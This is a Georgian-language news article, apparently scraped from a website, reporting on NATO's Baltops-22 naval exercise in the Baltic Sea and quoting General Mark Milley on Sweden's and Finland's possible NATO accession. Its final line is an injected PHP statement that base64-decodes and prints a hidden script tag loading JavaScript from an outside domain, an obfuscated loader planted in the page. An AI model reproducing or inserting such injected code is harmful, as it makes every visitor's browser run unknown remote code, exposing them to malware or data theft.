celsiusi
ავერსი შნაიდერი
დღეს ბალტიის ზღვაში ნატო-ს ყოველწლიური სამხედრო-საზღვაო სწავლება Baltops-22 იწყება, რომელშიც ალიანსის 14 წევრთან ერთად შვედეთი და ფინეთიც მონაწილეობენ.
 
როგორც ნატო-ს ოფიციალურ ვებ-გვერდზე განთავსებულ განცხადებაშია აღნიშნული, სამხედრო სწავლება 17 ივნისამდე გაგრძელდება და მასში შვიდი ათასზე მეტი მეზღვაური, მფრინავი და საზღვაო ქვეითი მიიღებს მონაწილეობას. მანევრებში ჩართულია 75 თვითმფრინავი და 45 ხომალდი.
 
ბალტიის ზღვაში ნატო-ს სწავლება 1972 წლიდან ტარდება. წელს წვრთნები ეძღვნება შვედეთის სამეფო სამხედრო-საზღვაო ფლოტის დაარსების 500 წლისთავს.
 
როგორც წვრთნების დაწყებამდე სტოკჰოლმში მყოფმა აშშ-ის შეიარაღებული ძალების გაერთიანებული შტაბების კომიტეტის მეთაურმა, გენერალმა, მარკ მილიმ განაცხადა, ფინეთის და შვედეთის გაწევრიანება ნატო-ში რუსეთს ბალტიის ზღვაში რთულ სამხედრო მდგომარეობაში ჩააგდებს.
 
„ბალტიის ზღვა სტრატეგიულად ძალიან მნიშვნელოვანია. ეს არის მსოფლიოს ერთ-ერთი უდიდესი საზღვაო გასასვლელი. როგორც მითხრეს, ბალტიის ზღვაში ყოველდღიურად 1 500-დან ორი ათასამდე კომერციული გემი გადაადგილდება. ჩვენ მრავალი წელია ვმუშაობთ შვედეთისა და ფინეთის შეიარაღებულ ძალებთან და ისინი უზარმაზარ პოტენციალს მოიტანენ, თუ საბოლოოდ ნატო-ში გაწევრიანდებიან. ასე რომ ეს არის ურთიერთთავსებადობის მასშტაბური წვრთნები. ეს ასევე აჩვენებს ერთგულებას საერთო საქმისადმი, წესებზე დაფუძნებული საერთაშორისო წესრიგისადმი და იმ იდეისადმი, რომ დიდ ქვეყნებს არ შეუძლიათ პატარა ქვეყნებში შეჭრა შედეგების გარეშე“, – განაცხადა მარკ მილიმ.
 
682
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");